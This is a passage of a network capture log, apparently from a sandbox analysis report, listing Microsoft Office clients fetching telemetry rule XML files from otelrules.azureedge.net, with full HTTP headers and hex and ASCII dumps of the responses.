                                                                                ETag: "0x8DC582BE7C66E85"
                                                                                x-ms-request-id: 42bb1403-701e-005c-578c-15bb94000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55whfstvfw43u8fp40000000cbg00000000ac7q
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                127192.168.2.55557913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule703401v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1425
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                ETag: "0x8DC582BE6BD89A1"
                                                                                x-ms-request-id: 89fd37a1-501e-008f-6d8c-159054000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc552g4w83buhsr3htc0000000cag00000000679v
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703401" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexus


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                128192.168.2.55557813.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule702300v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1362
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                ETag: "0x8DC582BDC13EFEF"
                                                                                x-ms-request-id: 819d44cb-f01e-0020-6f8c-15956b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55qdcd62bsn50hd6s0000000c1g000000008xw4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6a 65 63 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702300" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProject" S="Medium" /> <F T="2">


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                129192.168.2.55558013.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:14 UTC192OUTGET /rules/rule703400v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:14 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:14 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1388
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:37 GMT
                                                                                ETag: "0x8DC582BDBD9126E"
                                                                                x-ms-request-id: 9c5056bf-f01e-0003-548c-154453000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093414Z-15767c5fc55dtdv4d4saq7t47n0000000c1g000000008vgk
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:14 UTC1388INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 6c 65 53 75 72 66 61 63 65 73 22 20 53 3d 22 4d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703400" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ProgrammableSurfaces" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammableSurfaces" S="M


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                130192.168.2.55558413.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:15 UTC192OUTGET /rules/rule702500v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:15 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1378
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:36 GMT
                                                                                ETag: "0x8DC582BDB813B3F"
                                                                                x-ms-request-id: be019976-401e-0035-5d8c-1582d8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc55sdcjq8ksxt4n9mc00000001kg000000009nmh
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:15 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 67 72 61 6d 6d 61 62 69 6c 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Programmability" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProgrammability" S="Medium" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                131192.168.2.55558613.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:15 UTC192OUTGET /rules/rule700501v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1405
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:58 GMT
                                                                                ETag: "0x8DC582BE89A8F82"
                                                                                x-ms-request-id: 56c891cb-f01e-0085-428c-1588ea000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc55n4msds84xh4z67w000000060g000000006cvr
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC1405INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToke


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                132192.168.2.55559313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:15 UTC192OUTGET /rules/rule702551v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1415
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                ETag: "0x8DC582BDCE9703A"
                                                                                x-ms-request-id: 5f7380a8-801e-0015-7b8c-15f97f000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc5546rn6ch9zv310e0000000056g00000000a8fb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC1415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702551" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                133192.168.2.55559213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:15 UTC192OUTGET /rules/rule700500v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1368
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                ETag: "0x8DC582BE51CE7B3"
                                                                                x-ms-request-id: 2f845d93-b01e-0070-2f8c-151cc0000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc55472x4k7dmphmadg0000000c40000000000g9m
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC1368INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 6f 77 65 72 50 6f 69 6e 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 6f 77 65 72 50 6f 69 6e 74 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.PowerPoint" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPowerPoint" S="Medium" /> <F T=


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                134192.168.2.55559113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:15 UTC192OUTGET /rules/rule702550v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:15 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1378
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                ETag: "0x8DC582BE584C214"
                                                                                x-ms-request-id: b612907a-401e-008c-278c-1586c2000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093415Z-15767c5fc55w69c2zvnrz0gmgw0000000ckg0000000057cy
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC1378INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 35 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702550" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Personalization" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPersonalization" S="Medium" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                135192.168.2.55559913.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:16 UTC192OUTGET /rules/rule701351v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1407
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                ETag: "0x8DC582BE687B46A"
                                                                                x-ms-request-id: 2d1829d7-b01e-001e-738c-150214000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55tsfp92w7yna557w0000000cag000000006hge
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:16 UTC1407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 65 72 66 6f 72 6d 61 6e 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Performance.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTok


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                136192.168.2.55560213.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:16 UTC192OUTGET /rules/rule702151v1s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:16 UTC563INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:16 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 1397
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                ETag: "0x8DC582BE156D2EE"
                                                                                x-ms-request-id: 36a1620f-001e-0028-0f8c-15c49f000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093416Z-15767c5fc55d6fcl6x6bw8cpdc0000000cag00000000185p
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
